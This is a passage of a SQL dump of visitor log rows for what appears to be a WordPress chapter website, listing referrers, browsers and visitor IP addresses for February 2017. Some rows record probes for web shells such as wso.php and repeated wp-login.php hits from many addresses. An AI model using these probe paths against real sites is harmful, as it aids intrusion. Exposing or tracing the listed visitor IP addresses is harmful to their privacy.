Next','Windows','26.0.1656.60','','204.12.240.34','000',1,0),(244,'2017-02-12','https://www.google.com/','Safari','iPhone','10.0','','174.205.4.148','000',1,0),(245,'2017-02-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.44','000',1,0),(246,'2017-02-12','http://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','54.183.132.37','000',1,0),(247,'2017-02-12','http://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.67','000',1,0),(248,'2017-02-12','https://www.google.com/','Safari','iPhone','10.0','','173.73.83.159','000',1,0),(249,'2017-02-12','http://zphiblgz.org','Firefox','Macintosh','3.6.8','','159.8.235.23','000',35,0),(250,'2017-02-12','https://www.tattooreligion.ru/','Opera','Windows','7.11','','46.211.196.121','000',3,0),(251,'2017-02-12','http://zphiblgz.org','Firefox','Windows','29.0','','186.215.139.209','000',2,0),(252,'2017-02-12','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',4,0),(253,'2017-02-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(254,'2017-02-12','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',4,0),(255,'2017-02-12','http://zphiblgz.org/login.php?login=cmd','Chrome','Windows','42.0.2311.152','','195.154.181.162','000',1,0),(256,'2017-02-12','https://www.google.com/','Chrome','Windows','56.0.2924.87','','174.48.124.111','000',1,0),(257,'2017-02-12','http://zphiblgz.org','Safari','iPhone','10.0','','174.204.17.188','000',2,0),(258,'2017-02-12','http://zphiblgz.org','MSIE','Windows','6.0','','176.123.5.81','000',1,0),(259,'2017-02-12','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.80','000',1,0),(260,'2017-02-12','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.139','000',1,0),(261,'2017-02-12','http://zphiblgz.org','MSIE','Windows','8.0','','52.200.221.20','000',1,0),(262,'2017-02-13','http://zphiblgz.org','Firefox','Linux','31.0','','37.187.56.66','000',1,0),(263,'2017-02-13','http://zphiblgz.org','Firefox','Windows','29.0','','5.178.182.204','000',2,0),(264,'2017-02-13','http://zphiblgz.org','Chrome','Windows','54.0.2840.99','','117.78.13.56','000',1,0),(265,'2017-02-13','http://zphiblgz.org','Chrome','Windows','26.0.1410.64','','5.9.17.118','000',1,0),(266,'2017-02-13','http://zphiblgz.org/','Chrome','Windows','44.0.2403.125','','95.211.138.129','000',1,0),(267,'2017-02-13','http://anonymizeme.pro/go/hide.cgi?sg5j8b6vc2fd1g4u7h4b12f5q5y2c12n1l4f5s5i1g1fd5s2x2ds5f5h2j5f4s44d','Firefox','Macintosh','48.0','','79.137.85.189','000',1,0),(268,'2017-02-13','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.110','','192.99.9.164','000',2,0),(269,'2017-02-13','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',22,0),(270,'2017-02-13','http://zphiblgz.org','Firefox','Windows','49.0','','95.215.61.114','000',1,0),(271,'2017-02-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','95.215.61.114','000',1,0),(272,'2017-02-13','http://zphiblgz.org/contact/','Firefox','Windows','43.0','','46.119.118.59','000',13,0),(273,'2017-02-13','http://zphiblgz.org/contact/','Firefox','Windows','43.0','','46.118.112.219','000',8,0),(274,'2017-02-13','https://www.google.com/','Safari','iPhone','10.0','','174.205.2.114','000',3,0),(275,'2017-02-13','http://www.zphibmaryland.org/chapters/','Chrome','Windows','56.0.2924.87','','169.156.16.218','000',3,0),(276,'2017-02-13','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.172.67.190','000',1,0),(277,'2017-02-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(278,'2017-02-13','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(279,'2017-02-13','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.205.166.123','000',2,0),(280,'2017-02-13','http://zphiblgz.org/wp-smtp.php?up','Chrome','Windows','42.0.2311.152','','195.154.181.162','000',1,0),(281,'2017-02-13','https://www.google.com/','Safari','iPhone','10.0','','174.193.138.187','000',1,0),(282,'2017-02-13','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.26.223','000',1,0),(283,'2017-02-13','https://www.google.com/','Chrome','Android','44.0.2403.133','','104.138.251.245','000',3,0),(284,'2017-02-13','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','68.33.77.160','000',7,0),(285,'2017-02-13','https://www.google.com/','Chrome','Macintosh','45.0.2454.101','','50.30.207.253','000',1,0),(286,'2017-02-13','http://zphiblgz.org','Firefox','Linux','31.0','','23.106.27.50','000',2,0),(287,'2017-02-13','https://www.google.com/','Chrome','iPad','56.0.2924.79','','173.73.83.159','000',8,0),(288,'2017-02-13','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','71.244.250.154','000',3,0),(289,'2017-02-13','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','62.210.152.84','000',2,0),(290,'2017-02-13','http://domznaniy.ru/','MSIE','Windows','6.0','','46.211.196.121','000',3,0),(291,'2017-02-13','http://zphiblgz.org/','Chrome','Windows','43.0.2357.124','','66.147.242.174','000',3,0),(292,'2017-02-14','http://zphiblgz.org/','Chrome','Windows','43.0.2357.124','','66.147.242.174','000',16,0),(293,'2017-02-14','https://www.google.com/','Chrome','Android','55.0.2883.91','','76.232.48.52','000',3,0),(294,'2017-02-14','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',4,0),(295,'2017-02-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.60','000',1,0),(296,'2017-02-14','http://zphiblgz.org','Firefox','Windows','29.0','','143.202.182.0','000',2,0),(297,'2017-02-14','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','68.84.0.132','000',5,0),(298,'2017-02-14','http://zphiblgz.org','Chrome','Linux','37.0.2114.45','','109.236.86.17','000',1,0),(299,'2017-02-14','http://zphiblgz.org','Firefox','Windows','46.0','','109.236.86.17','000',1,0),(300,'2017-02-14','http://zphiblgz.org','Chrome','Windows','39.0.2186.62','','109.236.86.17','000',2,0),(301,'2017-02-14','http://zphiblgz.org','Firefox','Macintosh','31.0','','109.236.86.17','000',3,0),(302,'2017-02-14','http://zphiblgz.org','Firefox','Linux','33.0','','109.236.86.17','000',1,0),(303,'2017-02-14','http://zphiblgz.org/','Chrome','Windows','36.0.1985.97','','204.12.240.34','000',1,0),(304,'2017-02-14','https://www.google.com/','Safari','iPhone','10.0','','174.205.2.114','000',28,0),(305,'2017-02-14','http://zphiblgz.org','Opera','Windows','11.64','','88.99.141.3','000',1,0),(306,'2017-02-14','http://zphiblgz.org/','MSIE','Windows','6.0','','176.123.5.81','000',1,0),(307,'2017-02-14','http://zphiblgz.org/','Chrome','Windows','36.0.1985.97','','183.205.33.210','000',1,0),(308,'2017-02-14','http://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','Chrome','Windows','36.0.1985.97','','39.182.145.74','000',2,0),(309,'2017-02-14','http://zphiblgz.org','Chrome','Windows','36.0.1985.97','','192.198.80.227','000',2,0),(310,'2017-02-14','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(311,'2017-02-14','http://zphiblgz.org','Firefox','Windows','40.1','','109.175.103.41','000',2,0),(312,'2017-02-14','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','9.0','','5.61.35.40','000',1,0),(313,'2017-02-14','http://zphiblgz.org/wp-admin/','Safari','iPad','5.1','','5.61.35.40','000',1,0),(314,'2017-02-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.172.67.190','000',1,0),(315,'2017-02-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','188.138.105.84','000',1,0),(316,'2017-02-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','52.205.166.123','000',2,0),(317,'2017-02-14','http://zphiblgz.org/scholarship/','Chrome','Macintosh','46.0.2490.86','','204.126.132.241','000',5,0),(318,'2017-02-14','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.24.145','000',1,0),(319,'2017-02-14','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','129.2.181.154','000',9,0),(320,'2017-02-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(321,'2017-02-14','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(322,'2017-02-14','https://www.google.com/','Chrome','Windows','56.0.2924.87','','198.179.4.254','000',6,0),(323,'2017-02-14','http://zphiblgz.org/wp-includes/css/modules.php','Chrome','Windows','42.0.2311.152','','195.154.181.162','000',1,0),(324,'2017-02-14','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','96.231.108.136','000',7,0),(325,'2017-02-14','http://m.facebook.com/','Chrome','Android','55.0.2883.91','','66.87.81.18','000',8,0),(326,'2017-02-14','http://www.google.com/','Chrome','Android','55.0.2883.91','','172.58.184.78','000',1,0),(327,'2017-02-14','https://www.google.com/','Chrome','Windows','56.0.2924.87','','98.231.164.158','000',5,0),(328,'2017-02-15','http://zphiblgz.org','Firefox','Windows','29.0','','115.127.25.170','000',2,0),(329,'2017-02-15','http://zphiblgz.org','Firefox','Windows','29.0','','37.252.95.166','000',2,0),(330,'2017-02-15','http://zphiblgz.org/','Chrome','Windows','29.0.1600.1','','104.227.65.194','000',3,0),(331,'2017-02-15','zphiblgz.org','Chrome','Windows','50.0.2661.75','','196.45.48.87','000',6,0),(332,'2017-02-15','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.145.230.158','000',1,0),(333,'2017-02-15','http://zphiblgz.org','Chrome','Android','55.0.2883.91','','71.178.244.174','000',3,0),(334,'2017-02-15','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.203.93.26','000',1,0),(335,'2017-02-15','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.205.166.123','000',1,0),(336,'2017-02-15','http://zphiblgz.org','Chrome','Windows','29.0.1600.1','','192.198.80.227','000',2,0),(337,'2017-02-15','http://zphiblgz.org','Firefox','Windows','40.1','','125.160.103.104','000',2,0),(338,'2017-02-15','http://pizza-imperia.com/','Chrome','Linux','37.0.2062.120','','85.93.218.204','000',1,0),(339,'2017-02-15','http://zphiblgz.org','Chrome','Macintosh','26.0.1410.43','','82.130.13.154','000',13,0),(340,'2017-02-15','http://zphiblgz.org','Opera','Windows','12.14','','35.165.36.171','000',1,0),(341,'2017-02-15','http://zphiblgz.org','Firefox','Windows','40.1','','1.225.242.42','000',2,0),(342,'2017-02-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','93.180.64.220','000',1,0),(343,'2017-02-15','zphiblgz.org','Chrome','Windows','50.0.2661.75','','203.189.120.189','000',1,0),(344,'2017-02-15','zphiblgz.org','Chrome','Windows','50.0.2661.75','','133.242.54.221','000',1,0),(345,'2017-02-15','http://zphiblgz.org/','Chrome','Windows','29.0.1600.1','','107.173.6.94','000',3,0),(346,'2017-02-15','http://zphiblgz.org','Chrome','Windows','29.0.1600.1','','204.12.240.34','000',1,0),(347,'2017-02-15','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CFMQFjAA&url=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarships&ei=ba6kWNqlG9eca65e&usg=AFQjCNHzQyB3eH7AZKQRyHH1hTfo0_RGgg','Chrome','Windows','55.0.2883.87','','66.249.83.78','000',1,0),(348,'2017-02-15','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CFMQFjAA&url=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarships&ei=ba6kWNqlG9eca65e&usg=AFQjCNHzQyB3eH7AZKQRyHH1hTfo0_RGgg','Chrome','Windows','55.0.2883.87','','66.102.8.134','000',1,0),(349,'2017-02-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(350,'2017-02-15','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(351,'2017-02-15','http://zphiblgz.org/wso.php','Chrome','Windows','42.0.2311.152','','195.154.181.162','000',1,0),(352,'2017-02-15','https://www.google.com','Firefox','Windows','45.0','','214.4.253.121','000',4,0),(353,'2017-02-15','http://zphiblgz.org','Firefox','Windows','40.1','','41.230.90.165','000',2,0),(354,'2017-02-15','http://zphiblgz.org','Chrome','Android','44.0.2403.133','','66.87.81.123','000',2,0),(355,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','83.103.119.52','000',1,0),(356,'2017-02-15','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',8,0),(357,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','52.10.104.184','000',1,0),(358,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','104.152.168.29','000',1,0),(359,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','188.166.185.198','000',1,0),(360,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','185.167.208.105','000',1,0),(361,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','200.9.100.72','000',1,0),(362,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','210.238.91.71','000',1,0),(363,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','41.74.186.248','000',1,0),(364,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','52.41.191.130','000',1,0),(365,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','45.33.95.47','000',1,0),(366,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','52.204.28.73','000',1,0),(367,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','106.186.24.133','000',1,0),(368,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','209.59.140.126','000',1,0),(369,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','149.62.173.153','000',1,0),(370,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','74.208.111.241','000',1,0),(371,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','52.52.39.249','000',1,0),(372,'2017-02-15','http://zishy.adultsites.co/','Opera','Windows','11.01','','51.15.40.233','000',1,0),(373,'2017-02-15','http://zphiblgz.org/','Opera','Windows','11.01','','176.126.252.11','000',1,0),(374,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','188.166.13.72','000',1,0),(375,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','199.223.211.86','000',1,0),(376,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','195.5.163.201','000',1,0),(377,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','196.14.25.4','000',1,0),(378,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','151.80.243.115','000',1,0),(379,'2017-02-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.66','000',1,0),(380,'2017-02-15','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','144.76.13.239','000',1,0),(381,'2017-02-16','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.89','','49.212.180.201','000',1,0),(382,'2017-02-16','http://zphiblgz.org','Chrome','Windows','30.0.1599.101','','204.12.240.34','000',5,0),(383,'2017-02-16','http://zphiblgz.org','Chrome','Windows','29.0.1547.62','','52.36.91.137','000',2,0),(384,'2017-02-16','http://m.facebook.com/','Chrome','Android','55.0.2883.91','','71.178.244.174','000',8,0),(385,'2017-02-16','http://zphiblgz.org','Firefox','Windows','29.0','','77.242.24.64','000',2,0),(386,'2017-02-16','http://zphiblgz.org','Pinterest','Unknown','0.2','','54.236.1.13','000',1,0),(387,'2017-02-16','http://zphiblgz.org','Firefox','Windows','40.1','','182.68.163.74','000',2,0),(388,'2017-02-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.44','000',1,0),(389,'2017-02-16','http://zphiblgz.org/','Chrome','Windows','30.0.1599.101','','104.168.4.205','000',3,0),(390,'2017-02-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','153.126.185.245','000',3,0),(391,'2017-02-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','45.65.61.9','000',3,0),(392,'2017-02-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','149.202.195.113','000',2,0),(393,'2017-02-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','52.7.87.23','000',2,0),(394,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','176.53.82.130','000',1,0),(395,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','178.17.175.10','000',2,0),(396,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.217.165','000',1,0),(397,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','46.23.74.21','000',1,0),(398,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','203.22.132.90','000',1,0),(399,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.85.189.252','000',1,0),(400,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','151.236.48.130','000',1,0),(401,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','103.239.165.34','000',1,0),(402,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','107.190.135.122','000',1,0),(403,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.62.44.4','000',1,0),(404,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','85.214.196.241','000',2,0),(405,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','145.131.10.30','000',1,0),(406,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.241.198.224','000',1,0),(407,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.174.15.228','000',1,0),(408,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.97.176.172','000',2,0),(409,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','104.195.0.190','000',1,0),(410,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','196.33.227.210','000',2,0),(411,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','162.222.226.133','000',2,0),(412,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.198.172','000',1,0),(413,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.55.208.37','000',2,0),(414,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','159.203.141.16','000',2,0),(415,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','70.32.82.41','000',2,0),(416,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','74.124.197.176','000',2,0),(417,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.170.11','000',1,0),(418,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','125.212.218.206','000',1,0),(419,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.66.248.143','000',1,0),(420,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','83.172.141.25','000',1,0),(421,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','51.254.220.152','000',1,0),(422,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.199.125.242','000',1,0),(423,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.155.84.119','000',1,0),(424,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','217.16.187.176','000',1,0),(425,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.69.232.66','000',3,0),(426,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','78.47.139.172','000',2,0),(427,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','176.9.53.179','000',1,0),(428,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.155.2','000',2,0),(429,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.58.71.146','000',1,0),(430,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.162.134.94','000',3,0),(431,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.235.63.231','000',1,0),(432,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','207.210.200.109','000',1,0),(433,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','46.45.178.30','000',2,0),(434,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.191.99.3','000',2,0),(435,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','62.149.223.70','000',1,0),(436,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','144.76.92.178','000',1,0),(437,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','162.214.4.10','000',1,0),(438,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','168.212.192.14','000',1,0),(439,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.249.156.28','000',1,0),(440,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.27.80.46','000',1,0),(441,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.57.135.203','000',3,0),(442,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.55.128.168','000',1,0),(443,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.97.236.136','000',1,0),(444,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','104.131.59.97','000',1,0),(445,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.185.121','000',1,0),(446,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','111.221.46.104','000',1,0),(447,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.163.2','000',1,0),(448,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.207.176.166','000',1,0),(449,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','204.10.67.40','000',3,0),(450,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','78.137.164.236','000',1,0),(451,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.169.201.175','000',1,0),(452,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.216.117','000',2,0),(453,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.17.106.52','000',1,0),(454,'2017-02-16','http://zphiblgz.org','Firefox','Windows','47.0','','194.247.13.180','000',1,0),(455,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','104.152.168.36','000',2,0),(456,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.158.235.250','000',1,0),(457,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.162.241.98','000',1,0),(458,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','213.251.182.113','000',1,0),(459,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','31.210.53.51','000',2,0),(460,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','52.7.157.167','000',1,0),(461,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.170.197','000',1,0),(462,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','148.251.20.174','000',1,0),(463,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','138.68.131.126','000',1,0),(464,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','91.198.165.243','000',1,0),(465,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','203.0.141.204','000',3,0),(466,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.92.192.112','000',1,0),(467,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','62.141.46.188','000',2,0),(468,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','181.198.26.50','000',1,0),(469,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.254.103.187','000',2,0),(470,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','62.213.60.12','000',2,0),(471,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.143.172.58','000',1,0),(472,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','149.210.130.171','000',1,0),(473,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.174.53.232','000',1,0),(474,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','153.121.72.144','000',1,0),(475,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','103.6.196.87','000',1,0),(476,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.212.209.28','000',2,0),(477,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.69.232.65','000',1,0),(478,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.187.177.232','000',2,0),(479,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','103.23.201.18','000',1,0),(480,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.241.149.138','000',1,0),(481,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','149.202.216.235','000',2,0),(482,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','75.119.200.134','000',1,0),(483,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.220.92.68','000',2,0),(484,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.254.152.35','000',1,0),(485,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.254.28.100','000',1,0),(486,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','192.155.88.30','000',1,0),(487,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.65.61.9','000',2,0),(488,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','81.218.229.150','000',2,0),(489,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','72.9.155.66','000',1,0),(490,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.162.90','000',2,0),(491,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','43.231.113.82','000',2,0),(492,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','37.128.144.75','000',1,0),(493,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.69.232.9','000',1,0),(494,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.114.118.120','000',1,0),(495,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','78.47.199.86','000',1,0),(496,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','107.150.47.68','000',1,0),(497,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','202.174.34.220','000',1,0),(498,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','104.140.18.151','000',2,0),(499,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.236.168.112','000',1,0),(500,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','162.244.94.106','000',1,0),(501,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','88.208.252.82','000',1,0),(502,'2017-02-16','http://zphiblgz.org','Firefox','Windows','40.1','','88.246.195.226','000',2,0),(503,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','75.119.198.106','000',1,0),(504,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','194.150.248.195','000',1,0),(505,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.154.231.42','000',1,0),(506,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','74.220.215.202','000',2,0),(507,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','94.136.53.124','000',1,0),(508,'2017-02-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','182.162.21.85','000',1,0),(509,'2017-02-16','htt